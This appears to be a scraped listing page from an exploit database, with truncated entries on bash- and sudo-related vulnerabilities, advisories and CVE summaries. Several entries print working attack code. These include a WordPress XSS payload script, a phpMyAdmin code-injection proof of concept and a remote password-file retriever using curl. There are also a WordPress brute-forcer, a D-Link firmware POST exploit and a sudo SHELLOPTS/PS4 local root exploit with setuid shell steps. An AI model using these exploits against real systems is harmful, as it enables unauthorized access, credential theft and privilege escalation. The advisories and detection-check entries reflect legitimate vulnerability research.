WhatsApp Status Changer 0.2 Stable

!/bin/bash WhatsApp Status changer v0.2 stable A slim exploit able to change the WhatsApp user status in a remote way. This program is released under the terms of the GNU General Public License GPL, which is distributed with this software in the file "COPYING". The GPL specifies the terms under...

Trend Micro IWSS 3.1 - Local Privilege Escalation

source: https://www.securityfocus.com/bid/50380/info Trendmicro IWSS is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer. Trendmicro IWSS 3.1 is vulnerable;...

bash: Insecure temporary file use in aliasconv.sh, aliasconv.bash, cshtobash (symlink attack)

bash-doc 3.2 allows local users to overwrite arbitrary files via a symlink attack on a /tmp/cb.? temporary file, related to the 1 aliasconv.sh, 2 aliasconv.bash, and 3 cshtobash scripts...

IP Power 9258+ Authentication Bypass

Exploit for windows platform in category remote exploits | | | | | | | | \ | | | \ | | | \ | | | | | | | | | | | / | / | |,|||/ |,|||,| | \ \ \ | | \ | | | | / / ./ ,||| | |Teach, Learn, Party|Teach, Learn, Party|Teach, Learn, Party| irc.efnet.net unallocatedspace --=+Multiple Remote...

Статические анализаторы php. Мини-обзор

С течение времени мы все чаще и чаще можем видеть появление новых систем управления контентом CMS: форумов, блогов, шопов, социальных сетей, и т.д. и т.п. Многие из них, в силу некомпетентности или недостаточного уровня профессионализма их разработчиков, имеют в коде уязвимые места, позволяющие...

MDVA-2010:012 : kdebase4

In kde4.3 this is not possible to execute a bash script when double clicking on it. This update fixes this issue. %NASLMINLEVEL 70300 @DEPRECATED@ This script has been deprecated as the associated patch is not currently a security fix. Disabled on 2012/09/06. C Tenable Network Security, Inc. This...

sudo -- Secure path vulnerability

Todd Miller reports: Most versions of the C library function getenv return the first instance of an environment variable to the caller. However, some programs, notably the GNU Bourne Again SHell bash, do their own environment parsing and may choose the last instance of a variable rather than the...

Fedora Update for bournal FEDORA-2010-3221

Check for the Version of bournal OpenVAS Vulnerability Test Fedora Update for bournal FEDORA-2010-3221 Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under the...

Secunia Research: Bournal ccrypt Information Disclosure Security Issue

====================================================================== Secunia Research 22/02/2010 - Bournal ccrypt Information Disclosure Security Issue - ====================================================================== Table of Contents Affected...

WordPress 2.8.1 Cross Site Scripting

!/bin/bash echo "wp281.quickprz // iso^kpsbr" SITE=$1 COMMENT=$2 MESSAGE="h4x0riZed by the superfreakaz0rz" if "X$SITE" = "X" ; then echo "$0 postID" echo "f.e. $0 www.worstpress.eu" exit fi if "X$POSTID" = "X" ; then POSTID=1 fi echo "+ building payload" WHERE="title" can also be 'content'...

phpMyAdmin - '/scripts/setup.php' PHP Code Injection

!/bin/bash CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11 by pagvac gnucitizen.org, 4th June 2009. special thanks to Greg Ose labs.neohapsis.com for discovering such a cool vuln, and to str0ke milw0rm.com for testing this PoC script and providing feedback! PoC...

Wysi Wiki Wyg 1.0 - Remote Password Retrieve

!/bin/bash Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit by athos - stakerathotmaildotit host=$1; name=$2; path='/config/passwd.txt'; if "$name" = "" ; then echo "Usage: bash $0 host/path filename"; echo "by athos - stakerathotmaildotit"; exit; fi; curl $host/$path $name; clear cat $name;...

wp-bruteforcer.txt

!/usr/bin/env bash wordpress BruteForce v1.0 coded By 0x90 2008 0x90atbsdmail.org I do not take any reponsibilty for what you do with this tool Hopefully it will make your life easier rather then making other peoples lives more difficult! echo ".::Wordpress BruteForce By 0x90::." echo "use a good...

Provide the right to use a skills-vulnerability warning-the black bar safety net

Author: xi4oyu A linux mention of the right to use the tips, release to full when looking for a job to save RP. OK, under normal circumstances, we in the implementation of the bash script, there is an implementation process in which there is a little more important:if BASHENV is set, it will...

FreeBSD Ports: sudo

The remote host is missing an update to the system as announced in the referenced advisory. VID 1b725079-9ef6-11da-b410-000e0c2e438a OpenVAS Vulnerability Test $ Description: Auto generated from vuxml or freebsd advisories Authors: Thomas Reinke Copyright: Copyright c 2008 E-Soft Inc...

dlink.txt

!/bin/bash Coded Bt Ph3mt Of K-Security Team This Code is private, pls do not redistribute Release Date 25/11/2007 Code function dow echo 'POST /cgi-bin/firmwarecfg HTTP/1.1' richiesta echo 'Host: $IP' richiesta echo 'User-Agent: veryprivateacsor' richiesta echo 'Accept:...

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

Exploit for linux platform in category local exploits ================================================================ Sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls...

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation

Sudo 1.6.8p9 - SHELLOPTSPS4 Environment Variables Privilege Escalation Sudo local root escalation privilege vuln versions : sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! %...

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

CVE-2005-2959

CVE-2005-2959 concerns sudo 1.6.8 and earlier, where the SHELLOPTS and PS4 environment variables are not cleared during privilege-escalation prompts. The result is a local privilege escalation when a user with limited sudo privileges runs a bash script, as these variables can be passed through to...